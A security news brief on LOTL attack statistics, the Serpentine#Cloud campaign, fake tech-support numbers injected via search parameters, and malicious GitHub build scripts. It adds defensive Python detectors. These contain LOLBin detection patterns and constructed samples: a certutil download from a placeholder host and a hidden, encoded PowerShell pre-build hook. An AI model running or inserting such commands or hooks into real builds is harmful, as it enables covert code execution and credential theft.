
News brief: LOTL attacks, spoofed sites, malicious repositories

Check out the latest security news from the Informa TechTarget team.

Bitdefender researchers discovered that an overwhelming 84% of major attacks -- those incidents the vendor's cybersecurity platform rated as high severity -- use living-off-the-land (LOTL) techniques.

After analysis of more than 700,000 security events logged by the Bitdefender GravityZone platform across 90 days, researchers concluded that adversaries are "demonstrably successful in evading traditional defenses by expertly manipulating the very system utilities we trust and rely on daily -- and threat actors operate with a confident assertion of undetectability."

LOTL attacks aren't new. While the term was coined in 2013, the approach dates back to 2001's Code Red, a worm that ran entirely in memory, didn't download or install any files, and reportedly cost billions in damages.

In a nutshell, LOTL attacks use legitimate software and functions that already exist on victim systems to carry out the attack. In the case of Code Red, the worm exploited Microsoft's IIS web server software and went on to conduct DoS attacks. Because the activity runs through binaries and services that are already trusted, these attacks often blend into normal background operation and evade both users and signature-based tooling, making them difficult to prevent, detect and mitigate.

Once inside a victim's systems, attackers can perform reconnaissance, deploy fileless or memory-only malware, and steal credentials, among other LOTL techniques, often without the victim ever noticing.
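Because LOTL activity runs through binaries that are legitimately present, the useful detection signal is usually context (which parent launched the tool, and with what arguments) rather than the binary itself. The following is an added example, not part of the original brief or of Bitdefender's research: it applies a small set of context rules to constructed Sysmon-style process-creation events. The LOLBin list, the parent-process rule and the command-line patterns are an illustrative subset chosen for this example, not a complete rule set.

```python
"""Flag living-off-the-land activity in constructed process-creation events.

Added example for this brief; the events below are made up, and the rules are
a small illustrative subset of what a detection engineer would deploy.
"""
import ntpath
import re

# Trusted Windows utilities that are routinely abused as living-off-the-land
# binaries (LOLBins). Illustrative subset, not a complete catalogue.
LOLBINS = {
    "powershell.exe", "certutil.exe", "mshta.exe", "regsvr32.exe",
    "rundll32.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe",
}

# Office applications should not normally spawn script hosts or shells.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line traits that turn ordinary tool use into something worth a look.
CMDLINE_RULES = [
    (re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded PowerShell"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I), "certutil download"),
    (re.compile(r"https?://", re.I), "remote resource in command line"),
]


def score_event(event):
    """Return the list of reasons an event looks like LOTL abuse (empty if none)."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    reasons = []
    if image in LOLBINS and parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office application {parent}")
    for pattern, label in CMDLINE_RULES:
        if pattern.search(event["command_line"]):
            reasons.append(label)
    return reasons


def find_lotl(events):
    """Return [(index, reasons)] for every event with at least one reason."""
    hits = []
    for i, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -urlcache -split -f https://files.example.invalid/u.txt u.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for index, reasons in find_lotl(SAMPLE_EVENTS):
        print(f"event {index}: {'; '.join(reasons)}")
```

The third event, an administrator's scheduled PowerShell script, is deliberately left unflagged: PowerShell on its own is not a signal, and a rule that fires on every invocation of a trusted tool will be tuned out within a week. Real deployments would also baseline per-host parent/child pairs rather than rely on a static list.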

This week's roundup highlights a malware campaign whose LOTL tradecraft relies on Cloudflare Tunnel infrastructure and Python-based loaders. Plus, scammers use legitimate websites to trick victims seeking tech support, and malicious GitHub repositories masquerade as legitimate penetration testing suites.

Serpentine#Cloud uses shortcut files and Cloudflare infrastructure

Researchers at Securonix have identified a sophisticated malware campaign called Serpentine#Cloud that uses LNK shortcut files to deliver remote payloads. Attacks begin with phishing emails containing links to zipped LNK shortcut files that fetch and execute remote code when opened, ultimately deploying a Python-based, in-memory shellcode loader that backdoors systems.

Threat actors use Cloudflare's tunneling service to host the malicious payloads, benefiting from its trusted certificates and HTTPS transport, so the downloads blend in with legitimate traffic. While the campaign shows some sophistication reminiscent of nation-state actors, certain coding choices in these LOTL attacks suggest that Serpentine#Cloud is likely not the work of any major nation-state group.

Read the full story by Alexander Culafi on Dark Reading.

Scammers hijack search results with fake tech support numbers

Cybercriminals are creating deceptive tech support scams by purchasing sponsored Google ads that appear to represent major brands, including Apple, Microsoft and PayPal. Unlike traditional scams, these attacks direct users to the brand's genuine website, where a fraudulent support phone number supplied in the URL is displayed as if it were part of the page. When users call these numbers, scammers pose as official tech support to steal data and financial information or gain remote access to devices.

Malwarebytes researchers called this a "search parameter injection attack": the crafted URL carries the fake phone number in a query parameter, such as a site search term, and the genuine site reflects that text into its own page content. Users should verify support numbers through official company communications before calling, and never trust a number simply because it appears on the right domain.
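The mechanics are worth seeing from both sides: what the injected URL looks like after the site decodes it, and what a site owner can do about it. The following is an added example, not part of the original brief or of Malwarebytes' research; the URLs are constructed, example.com is a placeholder rather than any brand named in the story, and the phone-number and call-to-action patterns are assumptions chosen for the example.

```python
"""Spot 'search parameter injection' lures in ad landing URLs and scrub the
reflected value on the site side.

Added example for this brief; the URLs are constructed and example.com is a
placeholder, not any brand named in the story.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# North American phone-number shapes; deliberately loose, so expect false
# positives on order or ticket numbers and review hits by hand.
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
LURE_RE = re.compile(
    r"\b(call|helpline|support number|customer service|toll[\s-]?free)\b", re.I
)


def injected_params(url):
    """Return [(param, value, reasons)] for each query value carrying a phone lure.

    parse_qsl percent-decodes and turns '+' into spaces, which is the form the
    genuine site will reflect into its page, so patterns run on that form.
    """
    parts = urlsplit(url)
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = []
        if PHONE_RE.search(value):
            reasons.append("phone number")
        if LURE_RE.search(value):
            reasons.append("call-to-action wording")
        if reasons:
            hits.append((key, value, reasons))
    return hits


def scrub_reflected_query(value, max_len=80):
    """Site-side hardening: strip phone numbers and cap length before a search
    term is echoed back into page text such as 'Results for: ...'."""
    return PHONE_RE.sub("[number removed]", value)[:max_len]


# Constructed URLs: one lure in the style the story describes, two benign.
SAMPLE_URLS = [
    "https://www.example.com/search?q=Call+Support+Now+%2B1+800-555-0199",
    "https://www.example.com/search?q=wireless+keyboard",
    "https://www.example.com/help?topic=billing&lang=en",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", injected_params(url) or "clean")
```

Note that nothing here is an injection in the XSS sense; the site is behaving as designed and merely echoing the search term. That is exactly why the lure is hard to filter at the browser or proxy: the defence has to be either the ad platform refusing such landing URLs, the site declining to render untrusted query text prominently, or the user checking the number elsewhere.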

Read the full story by Kristina Beek on Dark Reading.

Threat group weaponizes GitHub repositories to target security pros

Trend Micro researchers identified a new threat group called Water Curse that weaponizes GitHub repositories disguised as legitimate security tools to deliver malware through malicious build scripts.

Active since March 2023, the group has used at least 76 GitHub accounts to target cybersecurity professionals, game developers and DevOps teams. The multistage malware can exfiltrate credentials, browser data and session tokens while establishing remote access and persistence. The attack typically begins when a victim downloads what appears to be an open source project but which carries embedded malicious code in its build configuration. That code runs during compilation, deploying VBScript and PowerShell payloads that perform system reconnaissance and data theft, so the victim is compromised by building the tool, not by running it.
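The practical check before building a cloned security tool is to look at what the build itself will execute. The following is an added example, not part of the original brief or of Trend Micro's research: it scans the build and install files of a repository for hooks that launch script interpreters or download utilities, and separately notes hidden or encoded execution flags. The repository contents are constructed; the build-time hook used here, an MSBuild pre-build event, is one common mechanism, and the story does not specify which hook Water Curse used. The file and interpreter lists are an illustrative subset.

```python
"""Pre-build check for a freshly cloned repository: find build-time hooks that
launch script interpreters or downloaders.

Added example for this brief; the repository contents are constructed, and the
file and interpreter lists are an illustrative subset.
"""
import re

# Files whose contents run at build or install time.
BUILD_FILE_RE = re.compile(
    r"(\.(vcxproj|csproj|props|targets)$)"
    r"|((^|/)(Makefile|CMakeLists\.txt|package\.json|setup\.py|build\.gradle)$)"
)

# Interpreters and download utilities that a C/C++ or .NET build rarely needs.
INTERP_RE = re.compile(
    r"\b(powershell|pwsh|cscript|wscript|mshta|certutil|bitsadmin|regsvr32|rundll32)(\.exe)?\b"
    r"|\bcmd(\.exe)?\s+/c\b",
    re.I,
)

# Flags that hide or obfuscate what is being run.
EVASION_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)


def scan_build_files(files):
    """files: {relative_path: text}. Return [(path, line_no, line, evasive)]."""
    hits = []
    for path, text in files.items():
        if not BUILD_FILE_RE.search(path):
            continue
        for line_no, line in enumerate(text.splitlines(), start=1):
            if INTERP_RE.search(line):
                hits.append((path, line_no, line.strip(), bool(EVASION_RE.search(line))))
    return hits


# Constructed repository: a tool that looks like a port scanner, with a
# pre-build event that runs hidden, encoded PowerShell before any C++ compiles.
SAMPLE_REPO = {
    "README.md": "# PortProbe\nFast port scanner. Open the .sln and build.\n",
    "src/main.cpp": "int main() { return 0; }\n",
    "PortProbe/PortProbe.vcxproj": (
        "<Project>\n"
        "  <ItemDefinitionGroup>\n"
        "    <PreBuildEvent>\n"
        "      <Command>powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Command>\n"
        "    </PreBuildEvent>\n"
        "  </ItemDefinitionGroup>\n"
        "</Project>\n"
    ),
    "Makefile": "all:\n\tcscript //nologo setup.vbs\n\t$(CC) -o portprobe src/main.cpp\n",
    "package.json": '{"scripts": {"postinstall": "node scripts/setup.js"}}\n',
}

if __name__ == "__main__":
    for path, line_no, line, evasive in scan_build_files(SAMPLE_REPO):
        flag = " [evasive flags]" if evasive else ""
        print(f"{path}:{line_no}: {line}{flag}")
```

The scan is deliberately narrow: a build that shells out to PowerShell or a script host is unusual enough to deserve a manual read, whereas flagging every lifecycle hook (the package.json postinstall above is left alone) produces noise. Running the build in a throwaway VM or container with no access to the developer's credentials is the complementary control, since a determined author can hide the hook in a file this list does not cover.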

Read the full story by Elizabeth Montalbano on Dark Reading.

Editor's note: Our staff used AI tools to assist in the creation of this news brief.

Sharon Shea is executive editor of Informa TechTarget's SearchSecurity site.
